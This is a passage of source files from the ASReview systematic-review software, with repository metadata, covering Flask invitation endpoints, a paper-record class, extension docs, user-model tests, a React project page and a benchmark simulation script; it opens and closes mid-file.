f'User \"{user.identifier}\" invited.'}),\n 200\n )\n except SQLAlchemyError:\n response = (\n jsonify({\"message\": f'User \"{user.identifier}\" not invited.'}),\n 404,\n )\n return response\n\n\[email protected](\"/invitations/projects/<project_id>/accept\", methods=[\"POST\"])\n@asreview_login_required\ndef accept_invitation(project_id):\n \"\"\"Invited person accepts an invitation.\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n # if user is current user, try to add this user to project\n if project and current_user in project.pending_invitations:\n # remove invitation\n project.pending_invitations.remove(current_user)\n # add as collaborator\n project.collaborators.append(current_user)\n try:\n DB.session.commit()\n response = (\n jsonify({\"message\": \"User accepted invitation for project.\"}),\n 200\n )\n except SQLAlchemyError:\n response = (\n jsonify({\"message\": \"Error accepting invitation.\"}),\n 404\n )\n return response\n\n\[email protected](\"/invitations/projects/<project_id>/reject\", methods=[\"DELETE\"])\n@asreview_login_required\ndef reject_invitation(project_id):\n \"\"\"Invited person rejects an invitation.\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n # if current_user is indeed invited\n if project and current_user in project.pending_invitations:\n # remove invitation\n project.pending_invitations.remove(current_user)\n try:\n DB.session.commit()\n response = (\n jsonify({\"message\": \"User rejected invitation for project.\"}),\n 200\n )\n except SQLAlchemyError:\n response = (\n jsonify({\"message\": \"Error rejecting invitation.\"}),\n 404\n )\n return response\n\n\[email protected](\"/invitations/projects/<project_id>/users/<user_id>\", methods=[\"DELETE\"])\n@asreview_login_required\ndef delete_invitation(project_id, user_id):\n \"\"\"removes an invitation\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n # check if project is from current user\n if project and project.owner == current_user:\n # get user\n user = DB.session.get(User, user_id)\n # remove from project\n project.pending_invitations.remove(user)\n try:\n DB.session.commit()\n response = jsonify({\"message\": \"Owner deleted invitation.\"}), 200\n except SQLAlchemyError:\n response = jsonify({\"message\": \"Error deleting invitation.\"}), 404\n return response\n" }, { "alpha_fraction": 0.5613059997558594, "alphanum_fraction": 0.5680791735649109, "avg_line_length": 26.816425323486328, "blob_id": "e6bc1b4d06ff517082e14f186f6274ff316baf1c", "content_id": "62c9140cee10dad1a8d23b33aafc134f1693f87a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5758, "license_type": "permissive", "max_line_length": 76, "num_lines": 207, "path": "/asreview/io/paper_record.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nimport pandas as pd\n\nfrom asreview.config import LABEL_NA\nfrom asreview.utils import format_to_str\n\n\ndef preview_record(record, w_title=80, w_authors=40, automatic_width=False):\n \"\"\"Return a single line preview string for record i.\n\n Arguments\n ---------\n record: PaperRecord\n The paperRecord to preview.\n w_title: int\n Width to be allocated for the title of the paper.\n w_authors: int\n Width to be allocated for the authors of the paper.\n automatic_width: bool\n If true, compute w_title, w_authors from the console width.\n\n Returns\n -------\n str:\n A string that previews a paper record.\n \"\"\"\n if automatic_width:\n term_width = os.get_terminal_size().columns\n width_available = term_width - 7\n w_title = round((2 / 3) * width_available)\n w_authors = width_available - w_title\n title_str = \"\"\n author_str = \"\"\n heading = record.title\n if heading is None:\n heading = record.abstract\n if heading is not None:\n if len(heading) > w_title:\n title_str = heading[: w_title - 2] + \"..\"\n else:\n title_str = heading\n\n if record.authors is not None:\n cur_authors = format_to_str(record.authors)\n if len(cur_authors) > w_authors:\n author_str = cur_authors[: w_authors - 2] + \"..\"\n else:\n author_str = cur_authors\n format_str = \"{0: <\" + str(w_title) + \"} \" + \"{1: <\" + str(w_authors)\n format_str += \"}\"\n prev_str = format_str.format(title_str, author_str)\n return prev_str\n\n\ndef format_record(record, use_cli_colors=True):\n \"\"\"Format one record for displaying in the CLI.\n\n Arguments\n ---------\n record: PaperRecord\n The paperRecord to format.\n use_cli_colors: bool\n Some terminals support colors, set to True to use them.\n\n Returns\n -------\n str:\n A string including title, abstracts and authors.\n \"\"\"\n if record.title is not None:\n title = record.title\n if use_cli_colors:\n title = \"\\033[95m\" + title + \"\\033[0m\"\n title += \"\\n\"\n else:\n title = \"\"\n\n if record.authors is not None and len(record.authors) > 0:\n authors = format_to_str(record.authors) + \"\\n\"\n else:\n authors = \"\"\n\n if record.abstract is not None and len(record.abstract) > 0:\n abstract = record.abstract\n abstract = \"\\n\" + abstract + \"\\n\"\n else:\n abstract = \"\"\n\n if record.included == 0:\n label = \"IRRELEVANT\"\n elif record.included == 1:\n label = \"RELEVANT\"\n else:\n label = \"\"\n\n header = f\"---{record.record_id}---{label}---\"\n\n return f\"\\n{header:-<60}\\n{title}{authors}{abstract}\"\n\n\nclass PaperRecord:\n \"\"\"A single record from a paper in a systematic review.\n\n Arguments\n ---------\n record_id: int\n Some identifier for this record.\n title: str\n Paper title.\n abstract: str\n Paper abstract.\n authors: str, list\n Authors of the paper.\n notes: str, list\n Notes of the paper.\n keywords: str, list\n Keywords of the paper.\n label: int\n Current label of the paper. No label is indicated by\n asreview.config.LABEL_NA (== -1).\n kwargs: dict\n Any extra keyword arguments will be put in self.extra_fields.\n \"\"\"\n\n def __init__(self, record_id, column_spec={}, **kwargs):\n for attr in [\n \"title\",\n \"abstract\",\n \"authors\",\n \"notes\",\n \"keywords\",\n \"doi\",\n \"url\",\n \"included\",\n ]:\n if attr in column_spec:\n col = column_spec[attr]\n elif attr in kwargs:\n col = attr\n else:\n col = None\n\n attr_val = kwargs.pop(col, None)\n if attr_val is not None and pd.isna(attr_val):\n attr_val = None\n setattr(self, attr, attr_val)\n\n self.record_id = record_id\n if self.included is None:\n self.included = LABEL_NA\n else:\n self.included = int(self.included)\n\n self.extra_fields = kwargs\n\n for attr, val in self.extra_fields.items():\n if not isinstance(val, list) and pd.isna(val):\n self.extra_fields[attr] = None\n\n def __str__(self):\n return format_record(self)\n\n @property\n def text(self):\n \"\"\"Create a single string from title + abstract.\n\n Returns\n -------\n str:\n Concatenated string from title + abstract.\n \"\"\"\n title = self.title\n abstract = self.abstract\n if title is None:\n title = \"\"\n if abstract is None:\n abstract = \"\"\n return title + \" \" + abstract\n\n @property\n def heading(self):\n \"\"\"Return the title of the paper.\"\"\"\n if self.title is None:\n return \"\"\n return self.title\n\n @property\n def body(self):\n \"\"\"Return the abstract of the paper.\"\"\"\n if self.abstract is None:\n return \"\"\n return self.abstract\n" }, { "alpha_fraction": 0.758849561214447, "alphanum_fraction": 0.7617993950843811, "avg_line_length": 38.30434799194336, "blob_id": "25befe350c47b6949e8ef1921d602bc34c84be8e", "content_id": "e3a3fa6055f91c4f76de55ce731254330c901b6d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2712, "license_type": "permissive", "max_line_length": 347, "num_lines": 69, "path": "/docs/source/extensions_overview.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Extensions\n==========\n\nASReview has extensive support for extensions. They can extend the\nfunctionality of ASReview LAB, and the\n:doc:`Command Line Interface <cli>`. There are :ref:`officially\nsupported extensions <extensions-official>` and `community maintained extensions <https://github.com/asreview/asreview/discussions/1140>`_.\n\nLooking to develop your own extension? See :ref:`develop-extensions` for\ndetailed instructions.\n\n\nInstallation\n------------\n\nMost extensions are installable from PyPI (the same way ASReview LAB is\ninstalled) or GitHub. It is preferred to follow the installation instructions\nprovided by the extension.\n\nThe following example shows the installation of `ASReview Insights\n<https://github.com/asreview/ASReview-insights>`__, an extension for plotting\nand computing metrics for simulations in ASReview.\n\n.. code:: bash\n\n pip install asreview-insights\n\nExtension (only) published on Github can be installed directly from the\nrepository. Replace `{USER_NAME}` and `{REPO_NAME}` by the corresponding\nvalues of the extension.\n\n.. code:: bash\n\n pip install [email protected]:{USER_NAME}/{REPO_NAME}.git\n\n\n.. _extensions-official:\n\nSupported Extensions\n--------------------\n\nThe following extensions are officially supported and maintained by the\nmaintainers of ASReview LAB. They are extensively tested and integrate well\nwith ASReview LAB.\n\n* ASReview Datatools\n - `ASReview-datatools <https://github.com/asreview/asreview-datatools>`__:\n Tool for describing, cleaning (input) data, and converting file formats via the command line.\n\n* ASReview Insights\n - `ASReview-insights <https://github.com/asreview/asreview-insights>`__:\n Advanced insights to ASReview simulations like performance plots and metrics.\n\n* ASReview Wordcloud\n - `ASReview-wordcloud <https://github.com/asreview/asreview-wordcloud>`__: Create wordclouds to visualize the contents of datasets.\n\n* ASReview Makita\n - `ASReview-makita <https://github.com/asreview/asreview-makita>`__: ASReviews' Makita (MAKe IT Automatic) is a workflow generator for simulation studies using the command line interface of ASReview LAB. Makita can be used to simplify your own research by enabling you to effortlessly generate the framework and code for your simulation study.\n\n\n.. _extensions-community:\n\nList of extensions for ASReview LAB\n-----------------------------------\n\nThe `List of extensions for ASReview LAB <https://github.com/asreview/asreview/discussions/1140>`__ on the Discussion platform\ngives an overview of known extensions to ASReview LAB and other useful tools\nin the AI-aided systematic review pipeline. These extensions can extend the\nsoftware with new models, subcommands, and datasets.\n" }, { "alpha_fraction": 0.651833713054657, "alphanum_fraction": 0.661644458770752, "avg_line_length": 26.798702239990234, "blob_id": "34c96ee4d296e393daf7ed9b06cb1d2f3e4ce107", "content_id": "9539e99402b2d011041ac295c40a58ff48dd48dd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8562, "license_type": "permissive", "max_line_length": 88, "num_lines": 308, "path": "/asreview/webapp/tests/test_database_and_models/test_user_model.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from datetime import datetime as dt\nfrom datetime import timedelta\n\nimport pytest\nfrom sqlalchemy.exc import IntegrityError\n\nimport asreview.webapp.tests.utils.config_parser as cp\nimport asreview.webapp.tests.utils.crud as crud\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.models import User\n\n# #############\n# CREATE\n# #############\n\n\n# test identifier validation\ndef test_user_must_have_identifier(setup_teardown):\n user = crud.create_user(DB)\n with pytest.raises(ValueError):\n user.identifier = None\n\n with pytest.raises(ValueError):\n user.identifier = \"\"\n\n\n# test uniqueness of identifier\ndef test_uniqueness_of_identifier(setup_teardown):\n user1 = crud.create_user(DB)\n assert crud.count_users() == 1\n # create second user with identical identifier\n user2 = cp.get_user(2)\n # set to an existing identifier\n user2.identifier = user1.identifier\n with pytest.raises(IntegrityError):\n crud.create_user(DB, user2)\n\n\n# test origin validation\ndef test_user_must_have_origin(setup_teardown):\n user = crud.create_user(DB)\n with pytest.raises(ValueError):\n user.origin = None\n\n with pytest.raises(ValueError):\n user.origin = \"\"\n\n\n# test name validation\ndef test_user_must_have_name(setup_teardown):\n user = crud.create_user(DB)\n with pytest.raises(ValueError, match=\"Name is required\"):\n user.name = None\n\n with pytest.raises(ValueError, match=\"Name is required\"):\n user.name = \"\"\n\n with pytest.raises(ValueError, match=\"Name must contain more than 2 characters\"):\n user.name = \"a\"\n\n with pytest.raises(ValueError, match=\"Name must contain more than 2 characters\"):\n user.name = \"ab\"\n\n\n# test if email is not blank if origin is \"asreview\"\ndef test_email_validation_1(setup_teardown):\n user = crud.create_user(DB)\n user.origin = \"asreview\"\n with pytest.raises(ValueError, match=\"Email is required when origin is 'asreview'\"):\n user.email = None\n\n with pytest.raises(ValueError, match=\"Email is required when origin is 'asreview'\"):\n user.email = \"\"\n\n\n# test if all fails when email is invalid\ndef test_email_validation_2(setup_teardown):\n user_data = crud.create_user(DB)\n invalid_email = \"invalid\"\n\n with pytest.raises(\n ValueError, match=f\"Email address '{invalid_email}' is not valid\"\n ):\n User(\n invalid_email,\n email=invalid_email,\n name=user_data.name,\n origin=\"asreview\",\n password=\"ABCd1234!\",\n )\n\n\n# test uniqueness of email\ndef test_uniqueness_of_email(setup_teardown):\n user1 = crud.create_user(DB)\n assert crud.count_users() == 1\n # create second user with identical email\n user2 = cp.get_user(2)\n # set to an existing identifier\n user2.email = user1.email\n with pytest.raises(IntegrityError):\n crud.create_user(DB, user2)\n\n\n# test if all fails when password doesn't meet requirements\[email protected](\n \"password\", [\"\", None, \"a1!\", \"aaaaaaaaaaaaa\", \"1111111111111\"]\n)\ndef test_password_validation(setup_teardown, password):\n with pytest.raises(\n ValueError, match=f'Password \"{str(password)}\" does not meet requirements'\n ):\n User(\n \"[email protected]\",\n email=\"[email protected]\",\n name=\"Casper\",\n origin=\"asreview\",\n password=password,\n )\n\n\n# Verify we can add a user record\ndef test_add_user_record(setup_teardown):\n user = crud.create_user(DB)\n # verify we have 1 record\n assert crud.count_users() == 1\n assert crud.last_user() == user\n\n\n# #############\n# UPDATE\n# #############\n\n\n# Verify we can update a user record\ndef test_update_user_record(setup_teardown):\n user = crud.create_user(DB)\n old_hashed_password = user.hashed_password\n\n new_email = \"[email protected]\"\n new_name = \"New Name\"\n new_affiliation = \"New Affiliation\"\n new_password = \"NewPassword@123\"\n new_public = False\n\n user.update_profile(\n email=new_email,\n name=new_name,\n affiliation=new_affiliation,\n password=new_password,\n public=new_public,\n )\n DB.session.commit()\n\n # verify we have 1 record\n assert crud.count_users() == 1\n updated_user = crud.last_user()\n # assert identifier remained the same\n assert updated_user.identifier != new_email\n # assert changes\n assert updated_user.email == new_email\n assert updated_user.affiliation == new_affiliation\n assert updated_user.hashed_password != old_hashed_password\n assert updated_user.public == new_public\n\n\n# verify reset password\ndef test_update_password(setup_teardown):\n user = crud.create_user(DB)\n old_hashed_password = user.hashed_password\n\n new_password = \"NewPassword@123\"\n user.reset_password(new_password)\n DB.session.commit()\n\n # verify we have 1 record\n assert crud.count_users() == 1\n updated_user = crud.last_user()\n assert updated_user.hashed_password != old_hashed_password\n\n\n# verify setting token and salt\ndef test_set_token(setup_teardown):\n user = crud.create_user(DB)\n\n assert user.token is None\n assert user.token_created_at is None\n\n user.set_token_data(\"secret\", \"salt\")\n DB.session.commit()\n\n # verify we have 1 record\n assert crud.count_users() == 1\n updated_user = crud.last_user()\n\n assert updated_user.token is not None\n assert updated_user.token_created_at is not None\n assert isinstance(updated_user.token_created_at, dt)\n\n\n# verify token validity, by default token is 24 hours valid\[email protected](\n \"subtract_time\", [(10, 0, True), (23, 59, True), (24, 1, False), (25, 0, False)]\n)\ndef test_token_validity(setup_teardown, subtract_time):\n subtract_hours, subtract_mins, validity = subtract_time\n user = crud.create_user(DB)\n user.set_token_data(\"secret\", \"salt\")\n DB.session.commit()\n # verify we have 1 record\n assert crud.count_users() == 1\n\n # assert token is valid\n token = user.token\n token_created_at = user.token_created_at\n assert user.token_valid(token)\n\n # now subtract hours\n new_token_created_time = token_created_at - timedelta(\n hours=subtract_hours, minutes=subtract_mins\n )\n # update token_created_at\n user.token_created_at = new_token_created_time\n\n # assert token validity\n assert user.token_valid(token) == validity\n\n\n# test confirming a user\ndef test_confirm_user(setup_teardown):\n user = crud.create_user(DB)\n # create a token for good measures\n user.set_token_data(\"secret\", \"salt\")\n\n assert user.confirmed is False\n assert bool(user.token)\n assert bool(user.token_created_at)\n\n # now lets confirm\n user.confirm_user()\n\n assert user.confirmed\n assert user.token is None\n assert user.token_created_at is None\n\n\n# #############\n# DELETE\n# #############\n\n\n# test deleting a user means deleting all projects\ndef test_deleting_user(setup_teardown):\n user, projects = crud.create_user1_with_2_projects(DB)\n assert crud.count_users() == 1\n assert crud.count_projects() == 2\n # remove the user\n DB.session.delete(user)\n DB.session.commit()\n assert crud.count_users() == 0\n # projects should be gone as well\n assert crud.count_projects() == 0\n\n\n# #############\n# PROPERTIES\n# #############\n\n\n# test projects\ndef test_projects_of_user(setup_teardown):\n crud.create_user1_with_2_projects(DB)\n assert crud.count_users() == 1\n assert crud.count_projects() == 2\n # get user\n user = crud.last_user()\n projects = crud.list_projects()\n assert set(user.projects) == set(projects)\n\n\n# test pending invitations\ndef test_pending_invitations(setup_teardown):\n user1, _ = crud.create_user1_with_2_projects(DB)\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 2\n user1 = crud.get_user_by_id(user1.id)\n project = user1.projects[0]\n project.pending_invitations.append(user2)\n DB.session.commit()\n # fresh object\n user2 = crud.get_user_by_id(user2.id)\n assert project in user2.pending_invitations\n\n\n# test collaborations\ndef test_collaboration(setup_teardown):\n user1, _ = crud.create_user1_with_2_projects(DB)\n user2 = crud.create_user(DB, user=2)\n assert crud.count_users() == 2\n assert crud.count_projects() == 2\n user1 = crud.get_user_by_id(user1.id)\n project = user1.projects[0]\n project.collaborators.append(user2)\n DB.session.commit()\n # fresh object\n user2 = crud.get_user_by_id(user2.id)\n assert project in user2.involved_in\n" }, { "alpha_fraction": 0.5305095911026001, "alphanum_fraction": 0.5316271781921387, "avg_line_length": 28.241830825805664, "blob_id": "fd0dd0b1352392641ff3fdd6327b4fe2a87720ab", "content_id": "3ba300b58d5f2f12a07c93984884d458f10d3a9b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8948, "license_type": "permissive", "max_line_length": 75, "num_lines": 306, "path": "/asreview/webapp/src/ProjectComponents/ProjectPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { connect, useSelector } from \"react-redux\";\n\nimport {\n Routes,\n Route,\n useMatch,\n useNavigate,\n useParams,\n useResolvedPath,\n} from \"react-router-dom\";\nimport clsx from \"clsx\";\nimport { Box } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { DialogErrorHandler } from \"../Components\";\nimport { AnalyticsPage } from \"../ProjectComponents/AnalyticsComponents\";\nimport { DetailsPage } from \"../ProjectComponents/DetailsComponents\";\nimport { HistoryPage } from \"../ProjectComponents/HistoryComponents\";\nimport { ExportPage } from \"../ProjectComponents/ExportComponents\";\nimport { TeamPage } from \"./TeamComponents\";\n\nimport {\n ReviewPage,\n ReviewPageFinished,\n} from \"../ProjectComponents/ReviewComponents\";\nimport RouteNotFound from \"../RouteNotFound\";\n\nimport { ProjectAPI } from \"../api/index.js\";\nimport {\n checkIfSimulationFinishedDuration,\n drawerWidth,\n mapDispatchToProps,\n projectModes,\n projectStatuses,\n} from \"../globals.js\";\nimport useAuth from \"../hooks/useAuth\";\n\nconst PREFIX = \"ProjectPage\";\n\nconst classes = {\n content: `${PREFIX}-content`,\n contentShift: `${PREFIX}-contentShift`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.content}`]: {\n transition: theme.transitions.create(\"margin\", {\n easing: theme.transitions.easing.sharp,\n duration: theme.transitions.duration.leavingScreen,\n }),\n [theme.breakpoints.up(\"md\")]: {\n marginLeft: 72,\n },\n },\n\n [`& .${classes.contentShift}`]: {\n transition: theme.transitions.create(\"margin\", {\n easing: theme.transitions.easing.easeOut,\n duration: theme.transitions.duration.enteringScreen,\n }),\n marginLeft: drawerWidth,\n },\n}));\n\nconst ProjectPage = (props) => {\n const authenticated = useSelector((state) => state.authentication);\n const { auth } = useAuth();\n const queryClient = useQueryClient();\n const navigate = useNavigate();\n const { project_id } = useParams();\n const resolved = useResolvedPath(\"\");\n const match = useMatch({ path: resolved.pathname, end: true });\n\n const isAnalyticsPageOpen = () => {\n return match !== null;\n };\n\n const [isSimulating, setIsSimulating] = React.useState(false);\n\n // is this user the ownwer of this project\n const [isOwner, setIsOwner] = React.useState(false);\n\n // History page state\n const [historyLabel, setHistoryLabel] = React.useState(\"relevant\");\n const [historyFilterQuery, setHistoryFilterQuery] = React.useState([]);\n\n const { data, error, isError, isSuccess } = useQuery(\n [\"fetchInfo\", { project_id }],\n ProjectAPI.fetchInfo,\n {\n enabled: project_id !== undefined,\n onSuccess: (data) => {\n // set ownership\n setIsOwner(auth?.id === data.ownerId);\n if (\n data.reviews[0] === undefined ||\n data[\"reviews\"][0][\"status\"] === projectStatuses.SETUP\n ) {\n // set project id\n props.setProjectId(project_id);\n // open project setup dialog\n navigate(\"/projects\");\n props.toggleProjectSetup();\n } else if (!data[\"projectNeedsUpgrade\"]) {\n // open project page\n console.log(\"Opening project \" + project_id);\n // if simulation is running\n if (\n data[\"mode\"] === projectModes.SIMULATION &&\n data[\"reviews\"][0][\"status\"] === projectStatuses.REVIEW\n ) {\n setIsSimulating(true);\n }\n } else {\n navigate(\"/projects\");\n // open project check dialog\n props.setProjectCheck({\n open: true,\n issue: \"upgrade\",\n path: \"\",\n project_id: project_id,\n });\n }\n },\n refetchOnWindowFocus: false,\n },\n );\n\n const refetchAnalytics = () => {\n if (isAnalyticsPageOpen()) {\n queryClient.invalidateQueries(\"fetchProgress\");\n queryClient.invalidateQueries(\"fetchProgressDensity\");\n queryClient.invalidateQueries(\"fetchProgressRecall\");\n }\n };\n\n const { error: checkSimulationError, isError: isCheckSimulationError } =\n useQuery(\n [\"fetchProjectStatus\", { project_id }],\n ProjectAPI.fetchProjectStatus,\n {\n enabled: isSimulating,\n onSuccess: (data) => {\n if (data[\"status\"] === \"finished\") {\n // refresh analytics\n refetchAnalytics();\n // simulation finished\n setIsSimulating(false);\n queryClient.invalidateQueries(\"fetchInfo\");\n } else {\n // not finished yet\n setTimeout(\n () => queryClient.invalidateQueries(\"fetchProjectStatus\"),\n checkIfSimulationFinishedDuration,\n );\n }\n },\n refetchOnWindowFocus: false,\n },\n );\n\n const returnError = () => {\n if (isError) {\n return [\"fetchInfo\", error, isError];\n } else if (isCheckSimulationError) {\n return [\n \"fetchProjectStatus\",\n checkSimulationError,\n isCheckSimulationError,\n ];\n } else {\n return [\"\", null, false];\n }\n };\n\n return (\n <Root aria-label=\"project page\">\n <Box\n component=\"main\"\n className={clsx(\"main-page-content\", classes.content, {\n [classes.contentShift]: !props.mobileScreen && props.onNavDrawer,\n })}\n aria-label=\"project page content\"\n >\n <Routes>\n {/* Analytics */}\n {isSuccess && !data?.projectNeedsUpgrade && (\n <Route\n index\n element={\n <AnalyticsPage\n isSimulating={isSimulating}\n mobileScreen={props.mobileScreen}\n mode={data?.mode}\n refetchAnalytics={refetchAnalytics}\n />\n }\n />\n )}\n\n {/* Review */}\n {isSuccess &&\n !data?.projectNeedsUpgrade &&\n data?.reviews[0].status === projectStatuses.REVIEW && (\n <Route\n path=\"review\"\n element={\n <ReviewPage\n mobileScreen={props.mobileScreen}\n projectMode={data?.mode}\n fontSize={props.fontSize}\n undoEnabled={props.undoEnabled}\n keyPressEnabled={props.keyPressEnabled}\n />\n }\n />\n )}\n\n {/* Review finished */}\n {isSuccess &&\n !data?.projectNeedsUpgrade &&\n data?.reviews[0].status === projectStatuses.FINISHED && (\n <Route\n path=\"review\"\n element={\n <ReviewPageFinished mobileScreen={props.mobileScreen} />\n }\n />\n )}\n\n {/* History */}\n {isSuccess && !data?.projectNeedsUpgrade && (\n <Route\n path=\"history\"\n element={\n <HistoryPage\n filterQuery={historyFilterQuery}\n label={historyLabel}\n isSimulating={isSimulating}\n mobileScreen={props.mobileScreen}\n mode={data?.mode}\n setFilterQuery={setHistoryFilterQuery}\n setLabel={setHistoryLabel}\n />\n }\n />\n )}\n\n {/* Team */}\n {isSuccess && authenticated && !data?.projectNeedsUpgrade && (\n <Route\n path=\"team\"\n element={\n <TeamPage\n isOwner={isOwner}\n mobileScreen={props.mobileScreen}\n mode={data?.mode}\n />\n }\n />\n )}\n\n {/* Export */}\n {isSuccess && !data?.projectNeedsUpgrade && (\n <Route\n path=\"export\"\n element={\n <ExportPage\n info={data}\n isSimulating={isSimulating}\n mobileScreen={props.mobileScreen}\n />\n }\n />\n )}\n\n {/* Details */}\n {isSuccess && !data?.projectNeedsUpgrade && (\n <Route\n path=\"details\"\n element={\n <DetailsPage\n info={data}\n isSimulating={isSimulating}\n mobileScreen={props.mobileScreen}\n setHistoryFilterQuery={setHistoryFilterQuery}\n />\n }\n />\n )}\n\n {isSuccess && <Route path=\"*\" element={<RouteNotFound />} />}\n </Routes>\n </Box>\n <DialogErrorHandler\n isError={returnError()[2]}\n error={returnError()[1]}\n queryKey={returnError()[0]}\n />\n </Root>\n );\n};\n\nexport default connect(null, mapDispatchToProps)(ProjectPage);\n" }, { "alpha_fraction": 0.6484317779541016, "alphanum_fraction": 0.6703136563301086, "avg_line_length": 31.571428298950195, "blob_id": "93e55e8ca22471922df557daea1e5a6381af4775", "content_id": "ac9c1cf9b979d17ecaa67fc7e8ae279991afb7d4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1371, "license_type": "permissive", "max_line_length": 103, "num_lines": 42, "path": "/tests/test_models.sh", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "\nDATASET=\"van_de_schoot_2017\"\n\nQUERY_STRATEGIES=('max_random' 'max_uncertainty' 'max' 'uncertainty' 'random')\n# ('max_random' 'max_uncertainty' 'max' 'uncertainty' 'random' 'cluster')\n\nfor qs in \"${QUERY_STRATEGIES[@]}\"\ndo\n asreview simulate benchmark:${DATASET} -q $qs --seed 535 --init_seed 535 -s ${DATASET}_${qs}.asreview\n asreview plot recall ${DATASET}_${qs}.asreview -o ${DATASET}_${qs}_recall.png\ndone\n\n\n\nBALANCE_STRATEGIES=('double' 'simple' 'undersample')\n\nfor bs in \"${BALANCE_STRATEGIES[@]}\"\ndo\n asreview simulate benchmark:${DATASET} -q $bs --seed 535 --init_seed 535 -s ${DATASET}_${bs}.asreview\n asreview plot recall ${DATASET}_${bs}.asreview -o ${DATASET}_${bs}_recall.png\ndone\n\n\n\nMODELS=('logistic' 'nb' 'rf' 'svm')\n# MODELS=('logistic' 'lstm-base' 'lstm-pool' 'nb' 'nn-2-layer' 'rf' 'svm')\n\nfor m in \"${MODELS[@]}\"\ndo\n asreview simulate benchmark:${DATASET} -q $m --seed 535 --init_seed 535 -s ${DATASET}_${m}.asreview\n asreview plot recall ${DATASET}_${m}.asreview -o ${DATASET}_${m}_recall.png\ndone\n\n\n\nFEATURE_STRATEGIES=('tfidf')\n# FEATURE_STRATEGIES=('doc2vec' 'embedding-idf' 'embedding-lstm' 'sbert' 'tfidf')\n\nfor fs in \"${FEATURE_STRATEGIES[@]}\"\ndo\n asreview simulate benchmark:${DATASET} -q $fs --seed 535 --init_seed 535 -s ${DATASET}_${fs}.asreview\n asreview plot recall ${DATASET}_${fs}.asreview -o ${DATASET}_${fs}_recall.png\ndone\n\n\n" }, { "alpha_fraction": 0.6326595544815063, "alphanum_fraction": 0.637951135635376, "avg_line_length": 32.15438461303711, "blob_id": "7a45d72eab2160ed399240060ed724e6cbc0e033", "content_id": "0cffdee1f4a45ac2a4bda5fb1c3513fb86b92bec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9449, "license_type": "permissive", "max_line_length": 89, "num_lines": 285, "path": "/asreview/webapp/authentication/models.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime as dt\nimport re\nfrom pathlib import Path\n\nfrom flask_login import UserMixin\nfrom itsdangerous import URLSafeTimedSerializer\nfrom sqlalchemy import Boolean\nfrom sqlalchemy import Column\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import Integer\nfrom sqlalchemy import String\nfrom sqlalchemy import UniqueConstraint\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.orm import validates\nfrom werkzeug.security import check_password_hash\nfrom werkzeug.security import generate_password_hash\n\nimport asreview.utils as utils\nfrom asreview.webapp import DB\n\nPASSWORD_REGEX = (\n r\"^(?=.*[A-Za-z])(?=.*\\d)(?=.*[@$!%*?&#])[A-Za-z\\d@$!%*?&#]{8,}$\" # noqa\n)\nEMAIL_REGEX = r\"\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,7}\\b\"\n\n\nclass User(UserMixin, DB.Model):\n \"\"\"The User model for user accounts.\"\"\"\n\n __tablename__ = \"users\"\n id = Column(Integer, primary_key=True)\n identifier = Column(String(100), nullable=False, unique=True)\n origin = Column(String(100), nullable=False)\n email = Column(String(100), unique=True)\n name = Column(String(100))\n affiliation = Column(String(100))\n hashed_password = Column(String(100))\n confirmed = Column(Boolean)\n public = Column(Boolean)\n token = Column(String(50))\n token_created_at = Column(DateTime)\n\n projects = relationship(\"Project\", back_populates=\"owner\", cascade=\"all, delete\")\n\n involved_in = relationship(\n \"Project\", secondary=\"collaborations\", back_populates=\"collaborators\"\n )\n\n pending_invitations = relationship(\n \"Project\",\n secondary=\"collaboration_invitations\",\n back_populates=\"pending_invitations\",\n )\n\n @validates(\"identifier\")\n def validate_identifier(self, _key, identifier):\n if not 